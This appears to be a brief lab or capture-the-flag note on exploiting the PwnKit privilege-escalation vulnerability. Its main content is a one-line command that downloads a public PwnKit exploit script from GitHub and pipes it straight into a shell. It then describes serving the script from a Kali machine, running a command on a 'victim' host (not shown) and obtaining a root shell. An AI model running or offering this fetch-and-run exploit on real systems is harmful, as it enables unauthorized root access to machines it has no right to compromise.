Pwnkit vulnerability

Below is the original command:

Original command
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

Exploit part 🤞

I will download .sh file first in kali linux and start the server.

Run below command in victim machine...

After running the above command you will get the shell as root.

Last updated